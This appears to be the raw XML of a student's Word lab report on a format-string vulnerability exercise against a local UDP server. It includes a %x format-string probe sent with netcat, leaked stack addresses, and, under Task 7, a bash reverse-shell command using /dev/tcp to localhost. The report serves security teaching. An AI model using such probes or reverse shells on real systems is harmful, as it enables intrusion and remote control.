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F39B01" w14:textId="41CF6099" w:rsidR="004C5788" w:rsidRDefault="00E474AE">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">TASK-1: </w:t>
      </w:r>
      <w:r w:rsidR="008C2570" w:rsidRPr="008C2570">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>The Vulnerable Program</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB995AA" w14:textId="77777777" w:rsidR="004C5788" w:rsidRPr="004C5788" w:rsidRDefault="004C5788">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="232ED36B" w14:textId="5BE2669E" w:rsidR="004C5788" w:rsidRPr="004C5788" w:rsidRDefault="00A539C9">
      <w:r w:rsidRPr="00A539C9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="457CA00B" wp14:editId="1C616FF8">
            <wp:extent cx="3979985" cy="158261"/>
            <wp:effectExtent l="0" t="0" r="1905" b="0"/>
            <wp:docPr id="212799201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92019" name="Picture 1" descr="A computer screen with white text&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId7"/>
                    <a:srcRect r="30372" b="90440"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3990738" cy="15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23D31" w14:textId="7C74AD71" w:rsidR="004C5788" w:rsidRDefault="004C5788">
      <w:r w:rsidRPr="0096778A">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6D9B7143" wp14:editId="068A2330">
            <wp:extent cx="4491740" cy="709246"/>
            <wp:effectExtent l="0" t="0" r="4445" b="0"/>
            <wp:docPr id="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44156" name="Picture 1" descr="A computer screen shot of text&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId8"/>
                    <a:srcRect l="648" t="6195" b="18807"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572183" cy="7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ADE87" w14:textId="66324F47" w:rsidR="0096778A" w:rsidRDefault="008626C8">
      <w:r>
        <w:t>TASK 2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A918D92" w14:textId="7332F27E" w:rsidR="00507698" w:rsidRDefault="00A95443">
      <w:r w:rsidRPr="00A95443">
        <w:t xml:space="preserve">To find the memory addresses </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AAB7646" w14:textId="13984B2E" w:rsidR="00081411" w:rsidRDefault="004C5788">
      <w:r>
        <w:t>Set a breakpoint at myprintf()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5488EFFD" w14:textId="6BA861F5" w:rsidR="004C5788" w:rsidRDefault="004C5788">
      <w:r w:rsidRPr="00F91542">
        <w:t>In a terminal</w:t>
      </w:r>
      <w:r w:rsidR="004024ED">
        <w:t xml:space="preserve"> type:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7758DED4" w14:textId="43DE2544" w:rsidR="00472A66" w:rsidRDefault="009E1857">
      <w:r w:rsidRPr="004C5788">
        <w:t>echo "</w:t>
      </w:r>
      <w:r w:rsidR="00F91542" w:rsidRPr="004C5788">
        <w:t>LAB</w:t>
      </w:r>
      <w:r w:rsidRPr="004C5788">
        <w:t xml:space="preserve"> %x %x %x %x" | nc -u 127.0.0.1 9090</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F8E62F4" w14:textId="4D98A76C" w:rsidR="00267A3E" w:rsidRDefault="00267A3E">
      <w:r w:rsidRPr="00267A3E">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="745BB306" wp14:editId="1F185FCC">
            <wp:extent cx="5731510" cy="3362960"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="16956924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2488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F649" w14:textId="76029187" w:rsidR="004024ED" w:rsidRDefault="004024ED" w:rsidP="004024ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Format String in printf()</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>0xbfffe76c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4636F9" w14:textId="5B95D0B7" w:rsidR="004024ED" w:rsidRDefault="004024ED" w:rsidP="004024ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Return Address of myprintf()</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>0xbfffe6fc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77639E9B" w14:textId="1D74F33F" w:rsidR="00597D29" w:rsidRDefault="004024ED" w:rsidP="004024ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Buffer buf[1500]</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>0xbfffe76c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D12820" w14:textId="77777777" w:rsidR="005410F3" w:rsidRDefault="005410F3"/>
    <w:p w14:paraId="25E62DB4" w14:textId="5F77F867" w:rsidR="008C2570" w:rsidRDefault="004F1797">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">B. </w:t>
      </w:r>
      <w:r w:rsidR="004024ED">
        <w:t xml:space="preserve"> 1-3 = 0, so the distance is zero</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1E5F4D" w14:textId="21BA1DFC" w:rsidR="008E49C9" w:rsidRDefault="008E49C9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TASK 3:</w:t>
      </w:r>
      <w:r w:rsidR="00F0050C">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F0050C" w:rsidRPr="00F0050C">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>Crash the Program</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A69122B" w14:textId="0AADDF70" w:rsidR="00130732" w:rsidRDefault="00130732">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00130732">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="792333E3" wp14:editId="1064EB91">
            <wp:extent cx="2502877" cy="2181860"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="721364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4309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075" r="56331" b="-1075"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2502877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8349" w14:textId="76F658D0" w:rsidR="004024ED" w:rsidRDefault="004024ED">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00130732">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="63BA26D6" wp14:editId="1E4B5C49">
            <wp:extent cx="3200400" cy="1049215"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="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4309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44793" r="-643" b="51903"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3200993" cy="104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ED956" w14:textId="06DB86C0" w:rsidR="009D0DB7" w:rsidRDefault="002111B3" w:rsidP="004024ED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TASK 4: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245DA59D" w14:textId="1FEEE2D2" w:rsidR="000B384C" w:rsidRDefault="000B384C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Stack Data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0214F467" w14:textId="1EFE8BEE" w:rsidR="009D0DB7" w:rsidRDefault="009D0DB7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D0DB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="79CC0439" wp14:editId="3236BA8E">
            <wp:extent cx="2444262" cy="2037080"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="729294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460" name="Picture 1" descr="A computer screen shot of a program&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId11"/>
                    <a:srcRect r="57354"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2444262" cy="20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8DCEC" w14:textId="323A8D8D" w:rsidR="00BF4778" w:rsidRPr="004024ED" w:rsidRDefault="004024ED">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D0DB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4DE622A2" wp14:editId="2AF21374">
            <wp:extent cx="3188677" cy="1441450"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="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460" name="Picture 1" descr="A computer screen shot of a program&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId11"/>
                    <a:srcRect l="43364" t="8057" r="980" b="21154"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3189951" cy="144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2F806" w14:textId="3156E2F1" w:rsidR="009D0DB7" w:rsidRDefault="00F43079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Task </w:t>
      </w:r>
      <w:r w:rsidR="004024ED">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>4b)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="208FE862" w14:textId="596A6179" w:rsidR="009F5C8F" w:rsidRDefault="009F5C8F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F5C8F">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6084AEE7" wp14:editId="73B89D9B">
            <wp:extent cx="2520315" cy="1981200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="16166756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75693" name="Picture 1" descr="A screenshot of a computer screen&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId12"/>
                    <a:srcRect r="56025" b="7495"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2520462" cy="198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80904" w14:textId="3D1783BD" w:rsidR="009F5C8F" w:rsidRDefault="004024ED">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F5C8F">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="745B6E5A" wp14:editId="20A8E8E1">
            <wp:extent cx="3176954" cy="931545"/>
            <wp:effectExtent l="0" t="0" r="4445" b="1905"/>
            <wp:docPr id="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75693" name="Picture 1" descr="A screenshot of a computer screen&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId12"/>
                    <a:srcRect l="43875" t="42421" r="648" b="5219"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3195728" cy="93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74341" w14:textId="661AF10D" w:rsidR="007D41E2" w:rsidRDefault="00F43079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Task </w:t>
      </w:r>
      <w:r w:rsidR="007D41E2">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>5.a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03FA60E1" w14:textId="3F56BBE3" w:rsidR="00184B1C" w:rsidRPr="00AA46CD" w:rsidRDefault="007D41E2" w:rsidP="00A07053">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D41E2">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5E6FCD3D" wp14:editId="1848A3CB">
            <wp:extent cx="3341077" cy="902677"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="47588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87403" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId13"/>
                    <a:srcRect r="41707" b="40196"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3341077" cy="90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FDBCF" w14:textId="5A5720A5" w:rsidR="00184B1C" w:rsidRDefault="00184B1C" w:rsidP="00A07053">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23D7F464" w14:textId="76CF0A6A" w:rsidR="0079166C" w:rsidRDefault="004024ED" w:rsidP="00A07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 </w:t>
      </w:r>
      <w:r w:rsidR="001C0A35">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>6.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C1866B0" w14:textId="0B93A575" w:rsidR="001C0A35" w:rsidRDefault="0079166C" w:rsidP="00A07053">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0079166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3F293C" wp14:editId="18E5600B">
            <wp:extent cx="3234764" cy="838005"/>
            <wp:effectExtent l="0" t="0" r="3810" b="635"/>
            <wp:docPr id="1569975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5152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5919" r="43548" b="37634"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3235569" cy="83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E795" w14:textId="6AE866C7" w:rsidR="0076225F" w:rsidRDefault="004024ED" w:rsidP="00A07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 </w:t>
      </w:r>
      <w:r w:rsidR="0079166C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>7.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5E20CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>reat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ing reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40210FFA" w14:textId="543C04FB" w:rsidR="005E20CB" w:rsidRDefault="005E20CB" w:rsidP="00A07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  <w:r w:rsidR="004961E5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>bin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/bash -c “</w:t>
      </w:r>
      <w:r w:rsidR="00B85CF9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>bin/bash -i&gt; /dev/tcp/127.0.0.1/7070 0&lt;</w:t>
      </w:r>
      <w:r w:rsidR="004961E5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&amp;1 2&gt;&amp;1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EBF4069" w14:textId="0C65CDF0" w:rsidR="009F6944" w:rsidRPr="004024ED" w:rsidRDefault="0090143C" w:rsidP="009F6944">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009014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3C0722" wp14:editId="08FA45AD">
            <wp:extent cx="3363541" cy="1084385"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="13878841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84198" name="Picture 1" descr="A screenshot of a computer screen&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId15"/>
                    <a:srcRect t="6143" r="41298" b="42187"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3364523" cy="108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6944" w:rsidRPr="004024ED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CA9734" w14:textId="77777777" w:rsidR="00FA293A" w:rsidRDefault="00FA293A" w:rsidP="003C4591">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="3FE8FB87" w14:textId="77777777" w:rsidR="00FA293A" w:rsidRDefault="00FA293A" w:rsidP="003C4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F723EC" w14:textId="77777777" w:rsidR="00FA293A" w:rsidRDefault="00FA293A" w:rsidP="003C4591">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="33679270" w14:textId="77777777" w:rsidR="00FA293A" w:rsidRDefault="00FA293A" w:rsidP="003C4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4C7446" w14:textId="779EFDE7" w:rsidR="003C4591" w:rsidRPr="003C4591" w:rsidRDefault="003C4591">
    <w:pPr>
      <w:pStyle w:val="Header"/>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        <w:b/>
        <w:bCs/>
        <w:sz w:val="36"/>
        <w:szCs w:val="36"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidRPr="003C4591">
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        <w:b/>
        <w:bCs/>
        <w:sz w:val="36"/>
        <w:szCs w:val="36"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:t>LAB 3</w:t>
    </w:r>
    <w:r w:rsidR="00763726">
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        <w:b/>
        <w:bCs/>
        <w:sz w:val="36"/>
        <w:szCs w:val="36"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:t xml:space="preserve">: </w:t>
    </w:r>
    <w:r w:rsidR="00763726" w:rsidRPr="00763726">
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        <w:b/>
        <w:bCs/>
        <w:sz w:val="36"/>
        <w:szCs w:val="36"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:t>Format String Vulnerability Lab</w:t>
    </w:r>
    <w:r w:rsidR="00763726" w:rsidRPr="00763726">
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        <w:b/>
        <w:bCs/>
        <w:sz w:val="36"/>
        <w:szCs w:val="36"/>
        <w:lang w:val="en-US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278C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A16C2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9C9"/>
    <w:rsid w:val="00021A56"/>
    <w:rsid w:val="0004546A"/>
    <w:rsid w:val="00081411"/>
    <w:rsid w:val="000B384C"/>
    <w:rsid w:val="000E67D5"/>
    <w:rsid w:val="00130732"/>
    <w:rsid w:val="0014386D"/>
    <w:rsid w:val="00184B1C"/>
    <w:rsid w:val="001B36C9"/>
    <w:rsid w:val="001C0A35"/>
    <w:rsid w:val="002111B3"/>
    <w:rsid w:val="0022117E"/>
    <w:rsid w:val="00232BFF"/>
    <w:rsid w:val="00267A3E"/>
    <w:rsid w:val="002A1852"/>
    <w:rsid w:val="002C3E89"/>
    <w:rsid w:val="00303AC0"/>
    <w:rsid w:val="003C4591"/>
    <w:rsid w:val="003F494C"/>
    <w:rsid w:val="004024ED"/>
    <w:rsid w:val="00453DB4"/>
    <w:rsid w:val="00471AD3"/>
    <w:rsid w:val="00472A66"/>
    <w:rsid w:val="004961E5"/>
    <w:rsid w:val="004C5788"/>
    <w:rsid w:val="004F1797"/>
    <w:rsid w:val="00507698"/>
    <w:rsid w:val="005410F3"/>
    <w:rsid w:val="0054787B"/>
    <w:rsid w:val="00553A25"/>
    <w:rsid w:val="00582827"/>
    <w:rsid w:val="00597D29"/>
    <w:rsid w:val="005E20CB"/>
    <w:rsid w:val="005E5F0A"/>
    <w:rsid w:val="005F0395"/>
    <w:rsid w:val="0076225F"/>
    <w:rsid w:val="00763726"/>
    <w:rsid w:val="0077503F"/>
    <w:rsid w:val="0079166C"/>
    <w:rsid w:val="007D41E2"/>
    <w:rsid w:val="008626C8"/>
    <w:rsid w:val="00884DEF"/>
    <w:rsid w:val="008C2570"/>
    <w:rsid w:val="008E49C9"/>
    <w:rsid w:val="0090143C"/>
    <w:rsid w:val="0096778A"/>
    <w:rsid w:val="009B1116"/>
    <w:rsid w:val="009D0DB7"/>
    <w:rsid w:val="009E1857"/>
    <w:rsid w:val="009F5C8F"/>
    <w:rsid w:val="009F6944"/>
    <w:rsid w:val="00A04871"/>
    <w:rsid w:val="00A07053"/>
    <w:rsid w:val="00A539C9"/>
    <w:rsid w:val="00A80AD3"/>
    <w:rsid w:val="00A95443"/>
    <w:rsid w:val="00AA46CD"/>
    <w:rsid w:val="00AC6D2F"/>
    <w:rsid w:val="00AF278E"/>
    <w:rsid w:val="00B85CF9"/>
    <w:rsid w:val="00B87BB0"/>
    <w:rsid w:val="00BA4B58"/>
    <w:rsid w:val="00BC3985"/>
    <w:rsid w:val="00BF4778"/>
    <w:rsid w:val="00C34420"/>
    <w:rsid w:val="00C4249C"/>
    <w:rsid w:val="00C5599C"/>
    <w:rsid w:val="00C56037"/>
    <w:rsid w:val="00C9382F"/>
    <w:rsid w:val="00D34840"/>
    <w:rsid w:val="00D844A4"/>
    <w:rsid w:val="00E474AE"/>
    <w:rsid w:val="00E80296"/>
    <w:rsid w:val="00F0050C"/>
    <w:rsid w:val="00F2316F"/>
    <w:rsid w:val="00F42DC1"/>
    <w:rsid w:val="00F43079"/>
    <w:rsid w:val="00F86AFB"/>
    <w:rsid w:val="00F91542"/>
    <w:rsid w:val="00FA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78FDC8"/>
  <w15:docId w15:val="{C1116355-4EB5-4791-9AA8-AA361B42D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4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45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591"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="003C45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591"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00402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Bhargav_Prasad_ 22736857</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Karasu, NAVEEN AJAY</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-02-29T16:16:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-03-19T04:28:00Z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b3da0d99-a60f-4262-971f-2cf5775be37c</vt:lpwstr>
  </property>
</Properties>
</file>